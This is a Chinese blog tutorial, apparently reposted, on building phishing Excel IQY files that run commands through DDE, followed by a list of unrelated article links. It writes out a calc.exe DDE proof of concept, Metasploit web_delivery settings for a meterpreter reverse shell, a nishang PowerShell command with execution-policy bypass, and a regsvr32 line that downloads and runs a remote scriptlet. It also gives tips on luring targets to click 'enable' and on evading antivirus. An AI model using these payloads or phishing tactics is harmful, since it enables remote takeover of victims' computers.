0x00 环境准备

1、操作系统:windows7
2、microsoft office版本:office 2010

0x01 了解IYQ的基本概念

可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用excel制作钓鱼邮件的机会,假如你要引入的web数据是入侵者事先准备好的一段payload iqy恶意代码,那结果就不言而喻了。

0x02 利用IYQ弹出计算器测试

一、在我们自己的服务器的网站目录下放一个payload.html文件,内容是IYQ代码

# IYQ代码     

 =cmd|'/c calc.exe '!A0

检验一下正常访问

接下来就是设置excel来拉取我们自己服务器上的payload文件

导入

点击“确定”

点击“是”过后,计算器程序被正常执行弹出

0x03 利用IYQ钓鱼弹shell测试

1、利用工具:

nishang:https://github.com/samratashok/nishang/releases

2、在kali攻击机下准备好MSF的payload

use exploit/multi/script/web_delivery

set target 3

set payload windows/meterpreter/reverse_tcp_rc4_dns

set lhost 192.168.3.29

set lport 53

set rc4password secquan.org

exploit -j

3、利用Out-WebQuery脚本来生成iqy文件

iqy文件本身的内容很简单,只有一个包含恶意payload的url:http://192.168.80.131/meter.html ,关键也就在这个 html,我们需要把 html 的内容换成加载我们上面准备好的 meterpreter payload 的 iqy 语句 :regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll),具体操作如下:
再用本次用来制作钓鱼文件的系统windown7执行如下命令:

powershell –exec bypass –Command "& {Import-Module 'C:\tools\nishang\Client\Out-WebQuery.ps1';Out-WebQuery -URL http://192.168.80.131/meter.html}"

命令成功执行过后,会新生成一个iqy文件

打开我们的web服务器,在根目录下创建一个meter.html文件,并在其中写入msf生成的payload构造的iqy代码

root@kali:~# /etc/init.d/apache2 start



root@kali:~# /etc/init.d/apache2 start

[ ok ] Starting apache2 (via systemctl): apache2.service.

root@kali:~# cd /var/www/html/

root@kali:/var/www/html# vim meter.html

root@kali:/var/www/html# cat meter.html

=cmd|'/c regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll '!A0

0x03 反弹shell

接下来就是引诱用户点击包含有IYQ漏洞的文件,一旦他正常双击打开[默认会调用 excel 来打开],便会弹出如下的安全警告框,至于怎么让他去点' enable '就需要用心好好琢磨下了

因为我们前面的 iqy 是用 cmd 执行的,所以这里它会问你是否要启动 cmd.exe,只要目标点击' 是',我们的 meterpreter 即会正常上线,具体如下

回到Kali的MSF上

发现meterpreter已成功上线

0x04 注意事项

  • 实战中用 Out-WebQuery.ps1 脚本直接去生成 iqy,还有些不够灵活,如果能在 iqy 中先添加一些正常数据,看上去肯定会更逼真,自己多次实测暂未成功,待后续找到完美的解决办法之后,再更新上来

  • 部分 AV,会侦测到此类的攻击,请务必做好相关免杀

文章转载至

https://www.cnblogs.com/ldhbetter/p/10893535.html

https://mp.weixin.qq.com/s?__biz=MzI2OTMzNjg4OQ==&mid=2247484505&idx=1&sn=29d2f7361662989f6a2e80b2966c228c&chksm=eae0ac0fdd972519a6de2d8fe87b82f22a6b50788bbb085265a94605e632a45ae1af36496509&mpshare=1&scene=1&srcid=&pass_ticket=MPX4KDSGdfDiM0ypnbycFFTT4KViy3PsSnmNfCGvvGQuUh9l9ubnX%2FJubb8YDmQy#rd

文章作者:

文刀问道(www.secquan.org)

最新文章

  1. 200行代码搞定炸金花游戏(PHP版)
  2. 托马斯微积分答案.djvu的书签
  3. [转载] Linux进程关系
  4. linux服务之varnish
  5. linux下vi命令的使用
  6. 希望获取到页面中所有的checkbox怎么做?
  7. 用smarty来做简易留言系统,明细步骤简单操作
  8. 【注意事项】APP左右横滑设计
  9. [LeetCode] Maximum Product of Three Numbers 三个数字的最大乘积
  10. 计算器源码(数学式python)
  11. Python实现Telnet自动连接检测密码
  12. 【k短路&A*算法】BZOJ1975: [Sdoi2010]魔法猪学院
  13. ES 06 - 通过Kibana插件增删改查ES中的索引文档
  14. Linux图形化监控网络流量:speedometer查看流量
  15. 【读书笔记】iOS-自定义 URL Scheme 完全指南
  16. 【实战解析】基于HBase的大数据存储在京东的应用场景
  17. 第三章Div水平居中
  18. Python大黑阔—url采集+exp验证,带你批量测试
  19. linker command failed with exit code 1 (use -v to see invocation) 变量重名
  20. JAVA-JSP之taglib指令

热门文章

  1. C++之路 #1
  2. ThinkPHP5 支付宝 电脑与手机支付扩展库
  3. 【原】git如何撤销已提交的commit(未push)
  4. 报错fatal: refusing to merge unrelated histories
  5. 购买https证书以及nginx配置https
  6. flask 微电影网站
  7. Python操作三大主流数据库☝☝☝
  8. hibernate之小白一
  9. 零基础:如何快速学习JavaScript,html+css技术
  10. 深入了解一下HTTP缓存机制